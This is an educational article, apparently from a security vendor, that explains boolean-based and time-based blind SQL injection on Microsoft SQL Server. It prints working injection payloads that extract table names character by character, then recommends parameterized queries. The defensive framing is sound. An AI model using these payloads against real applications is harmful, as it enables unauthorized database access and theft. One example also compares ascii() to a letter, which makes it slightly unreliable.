Blind SQL Injection is a type of attack where an attacker does not receive an obvious response from the affected database but instead reconstructs its structure step by step based on the behavior of the database server and application.
There are two types of blind SQL injections: boolean-based and time-based.
Effects of Blind SQL Injection
Performing an attack using blind SQL injections takes much longer than a regular one, but can produce the same results. Based on the behavior of the database server and application, an attacker can do the following:
- Check if other types of SQL injections are possible to execute
- Learn the structure of the database
- Obtain information from the database
What Is Boolean-Based Blind SQL Injection?
Boolean-based SQL Injection is a subtype of blind SQL Injection where an attacker observes the behavior of the database server and application after combining legitimate queries with malicious data using boolean operators.
Note: The information provided is in no way intended to encourage illegal actions, it is educational material for security professionals to understand the potential risks and specifics of such attacks.
Example of Boolean Blind SQL Injection
As an example, the following query is intended to display product details from a database:
SELECT * FROM products WHERE id = product_idFirst, the attacker uses the application in a legitimate way to detect at least one existing product ID — in this example, product 42. Then, they can provide the following two values for product_id:
42 AND 1=142 AND 1=0If this query is executed in the application using a simple string concatenation, the query accordingly becomes:
SELECT * FROM products WHERE id = 42 and 1=1SELECT * FROM products WHERE id = 42 and 1=0If the application behaves differently in each case, it is vulnerable to boolean-based blind SQL injections.
And if the database server is Microsoft SQL Server, the attacker can now provide the following value for product_id:
42 AND (SELECT TOP 1 substring(name, 1, 1)
FROM sysobjects
WHERE id=(SELECT TOP 1 id
FROM (SELECT TOP 1 id
FROM sysobjects
ORDER BY id)
AS subq
ORDER BY id DESC)) = 'a'As a result, the subquery in parentheses after 42 AND checks whether the name of the first table in the database starts with the letter “a”. If the value is true, the program will behave the same as for the payload 42 AND 1=1. If the value is false, the program will behave the same as for the payload 42 AND 1=0.
The attacker can go through all the letters, and then move to the second letter, the third letter, and so on. As a result, he can learn the full name of the first table in the database structure. They can then try to get more information about the structure of this table and finally extract data from it. Although this example is specific to MS SQL, similar techniques exist for other types of databases.
What is Time-Based Blind SQL Injection?
Time-based SQL injection is a subtype of blind SQL injection, where an attacker observes the behavior of the database server and application after combining legitimate queries with SQL commands that cause time delays.
Example of a Time-Based Blind SQL injection
The same query can be taken as in the example above:
SELECT * FROM products WHERE id = product_idThe attacker could provide the following value for product_id:
42; WAITFOR DELAY '0:0:10'The resulting query becomes:
SELECT * FROM products WHERE id = 1; WAITFOR DELAY '0:0:10'If the database server is Microsoft SQL Server and the application is vulnerable to time-based blind SQL injection, the attacker would see a 10-second delay in the application.
Now that the attacker knows that time-based blind SQL injections are possible, they can provide the following value for product_id:
42; IF(EXISTS(SELECT TOP 1 *
FROM sysobjects
WHERE id=(SELECT TOP 1 id
FROM (SELECT TOP 1 id
FROM sysobjects
ORDER BY id)
AS subq
ORDER BY id DESC)
AND ascii(lower(substring(name, 1, 1))) = 'a'))
WAITFOR DELAY '0:0:10'If the name of the first table in the database structure starts with the letter “a”, the second part of this query will be true, and the application will respond with a 10-second delay.
As with the logical blind SQL injections described above, the attacker can use this method repeatedly to learn the name of the first table in the database structure, and then try to get more data about it and extract data from the table.
An article about cache bypass techniques for time-based SQL injection can be read here.
How to Prevent Blind SQL Injection Vulnerabilities?
The only completely effective way to prevent all types of SQLi vulnerabilities in a web application, including blind ones, is to use parameterized queries to access SQL databases.
If a programming language does not support parameterized queries, but a database engine does support stored procedures, teams can use them with prepared statements.
Relying solely on other prevention methods, such as whitelists, blacklists, or input filtering/escaping, is not recommended. Attackers can find a way around this.
Blind SQL Injection Detection
The only way to check if a site is vulnerable to SQL injection is to test its security.
In particular, you can use a DAST (black-box testing) solution, which allows teams to find this vulnerability in time for quick remediation.
If you want to try Invicti DAST (based on Acunetix and Netsparker) for free, then leave your contacts and we will contact you:
